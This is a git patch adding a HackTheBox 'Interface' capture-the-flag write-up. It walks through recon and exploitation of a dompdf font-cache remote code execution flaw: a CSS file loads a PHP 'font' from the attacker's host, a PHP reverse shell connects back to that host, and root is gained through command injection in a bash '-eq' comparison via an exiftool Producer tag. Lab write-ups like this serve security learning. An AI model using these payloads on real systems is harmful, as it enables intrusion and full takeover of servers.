From ec598636bddb3b1066abdfc3e4d9985d0449d052 Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Sat, 13 May 2023 22:06:43 +0300 Subject: [PATCH] Create Interface.md --- HackTheBox/Interface.md | 183 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 HackTheBox/Interface.md diff --git a/HackTheBox/Interface.md b/HackTheBox/Interface.md new file mode 100644 index 0000000..7139e55 --- /dev/null +++ b/HackTheBox/Interface.md @@ -0,0 +1,183 @@ +# HackTheBox - Interface + +## NMAP + +```bash +Nmap scan report for 10.10.11.200 +Host is up (0.38s latency). +Not shown: 65533 closed tcp ports (reset) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 7289a0957eceaea8596b2d2dbc90b55a (RSA) +| 256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA) +|_ 256 cc62905560a658629e6b80105c799b55 (ED25519) +80/tcp open http nginx 1.14.0 (Ubuntu) +|_http-title: Site Maintenance +|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA +| http-methods: +|_ Supported Methods: GET HEAD +|_http-server-header: nginx/1.14.0 (Ubuntu) +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel +``` + +## PORT 80 (HTTP) + +The webserver shows a note on the site about some maintenance + + + +Fuzzing for files and directories using `dirsearch` + + + +It didn't find anything from fuzzing, on checking the response headers it has some sites being shown out of which there's `prd.m.rendering-api.interface.htb` + + + + +Here I tried fuzzing but again there were no results other than `vendor` so fuzzing there again to see if there's something accessible + + + + +This found `/dompdf` but it's giving us 403 + + + +Since this is an api from what the subdomain tells us, let's try fuzzing on `/api` for POST requests + + + +## Foothold + +For sending a POST request to `html2pdf` I struggled a lot in finding a proper way to send POST requests and documentaiton didn't really included that, on dompdf's github page I found that it's using `html` parameter for converting html + +https://github.com/dompdf/dompdf/wiki/About-Fonts-and-Character-Encoding + + +With this request we'll be able to convert HTML to PDF + + + +Dompdf is vulnerable to remote code execution through loading css which then loads the font that is cached + +https://positive.security/blog/dompdf-rce + +We have our css file which is loading the font that is actually a php file executing `phpinfo()` and from the article it explains that dompdf excepts any file extension as long as header belongs to a font file + +```css +@font-face { + font-family:'exploitfont'; + src:url('http://10.10.14.70:9001/exploit_font.php'); + font-weight:'normal'; + font-style:'normal'; + } +``` + +And we have our font file + +https://github.com/positive-security/dompdf-rce/blob/main/exploit/exploit_font.php + + + +We need to load a css with from our machine so sending a request with href + +```html +" +``` + + + + + +To access the cached php font file we need to visit this url to access our cached font php file + +``` +http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/fontname_fontweight/style_urlmd5hash.php +``` + +To calculate the hash of the url +`http://10.10.14.70:9001/exploit_font.php` + + + +So the url becomes + +``` +http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_3b08b785afb0c81b1ea0920e80175f2d.php +``` + + + +We can now get rce by just adding `` + + + +With php we can get reverse shell + +```bash +http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_3b08b785afb0c81b1ea0920e80175f2d.php?cmd=php%20-r%20%27$sock=fsockopen(%2210.10.14.70%22,2222);$proc=proc_open(%22/bin/sh%20-i%22,%20array(0=%3E$sock,%201=%3E$sock,%202=%3E$sock),$pipes);%27 +``` + + + +## Privilege Escalation (root) + +Running `pspy` we see a bash script `/usr/local/sbin/cleancache.sh` being ran as root user + + + +Checking the bash script + +```bash +#! /bin/bash +cache_directory="/tmp" +for cfile in "$cache_directory"/*; do + if [[ -f "$cfile" ]]; then + meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1) + if [[ "$meta_producer" -eq "dompdf" ]]; then + echo "Removing $cfile" + rm "$cfile" + fi + fi +done +``` + +It's running `/tmp` directory where it's checking for files and `exiftool` is looking for `Producer` tag in the files and comaparing it with `-eq` if it's dompdf and if it, it will delete that file + +I checked the version of exiftool which was 12.55 and there wasn't any reported vulnerability for this version + + + +The vulnerability here was with in the script on the comparision + +```bash +"$meta_producer" -eq "dompdf" +``` + +```bash +exiftool -Producer='a[$(id)]+dompdf' ./export.pdf +``` + + + + + +Now we can't really use spaces here as the Producer meta data is being seperated with `cut` on a space so instead I created a bash script having the reverse shell + +```bash +exiftool -Producer='a[$(/dev/shm/uwu.sh)]+dompdf' ./export.pdf +``` + + + +After transffering the file, wait for the cronjob to trigger the script + + +## References + +- https://github.com/dompdf/dompdf/wiki/About-Fonts-and-Character-Encoding +- https://positive.security/blog/dompdf-rce +- https://github.com/positive-security/dompdf-rce +- https://www.vidarholen.net/contents/blog/?p=716